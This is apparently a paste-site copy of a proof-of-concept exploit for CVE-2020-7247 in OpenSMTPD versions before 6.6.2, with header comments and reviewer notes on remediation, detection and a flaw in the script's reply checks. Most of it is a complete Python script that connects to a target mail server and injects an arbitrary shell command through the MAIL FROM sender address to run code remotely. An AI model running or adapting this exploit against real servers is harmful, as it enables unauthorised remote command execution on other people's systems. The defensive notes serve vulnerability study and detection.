hadipras

OpenSMTPD 6.6.2 - Remote Code Execution

Feb 6th, 2020
# Exploit Title: OpenSMTPD 6.6.2 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
#
# Reviewer notes (defensive reading of this proof of concept):
#   * The user-controlled input is the envelope sender: the script places the
#     command between ';' characters inside the MAIL FROM address, with no
#     domain part. Per the referenced advisory, that address later reaches a
#     shell command line when the message is delivered.
#   * Remediation is the upgrade named above (6.6.2 or later). Until a host is
#     patched, limiting which networks can reach its SMTP listener reduces
#     exposure.
#   * Detection: look in SMTP logs or captures for MAIL FROM addresses that
#     contain ';' or other shell metacharacters and lack a domain. This
#     particular script also sends "HELO x", "RCPT TO:<root>" and a body of
#     "xxx", which are weak but usable session fingerprints.
#   * NOTE(review): the reply checks below run on str(bytes), i.e. on the
#     b'...' repr, so '250' matches anywhere in the reply text.
#
# The interpreter line below is not the first line of the file, so it acts as
# an ordinary comment rather than a shebang.
#!/usr/local/bin/python3

from socket import *
import sys


def _bail(*lines):
    """Print each diagnostic line in order, then exit with status 1."""
    for line in lines:
        print(line)
    sys.exit(1)


def _exchange(conn, data):
    """Send one chunk on *conn* and return up to 1024 bytes of the reply."""
    conn.send(data)
    return conn.recv(1024)


# Exactly three arguments are required: target address, port and command.
if len(sys.argv) != 4:
    _bail(
        'Usage {} <target ip> <target port> <command>'.format(sys.argv[0]),
        "E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]),
    )

ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))

# The server speaks first; the greeting banner must name OpenSMTPD.
banner = s.recv(1024)
if 'OpenSMTPD' not in str(banner):
    _bail(
        '[!] No OpenSMTPD detected',
        '[!] Received {}'.format(str(banner)),
        '[!] Exiting...',
    )
print('[*] OpenSMTPD detected')

helo_reply = _exchange(s, b'HELO x\r\n')
if '250' not in str(helo_reply):
    _bail(
        '[!] Error connecting, expected 250',
        '[!] Received: {}'.format(str(helo_reply)),
        '[!] Exiting...',
    )
print('[*] Connected, sending payload')

# The sender address is the field affected versions fail to sanitise.
mail_reply = _exchange(s, 'MAIL FROM:<;{};>\r\n'.format(CMD).encode('utf-8'))
if '250' not in str(mail_reply):
    _bail(
        '[!] Error sending payload, expected 250',
        '[!] Received: {}'.format(str(mail_reply)),
        '[!] Exiting...',
    )
print('[*] Payload sent')

# Finish the transaction; these replies are read and discarded unchecked.
for smtp_line in (
    b'RCPT TO:<root>\r\n',
    b'DATA\r\n',
    b'\r\nxxx\r\n.\r\n',
    b'QUIT\r\n',
):
    _exchange(s, smtp_line)
print('[*] Done')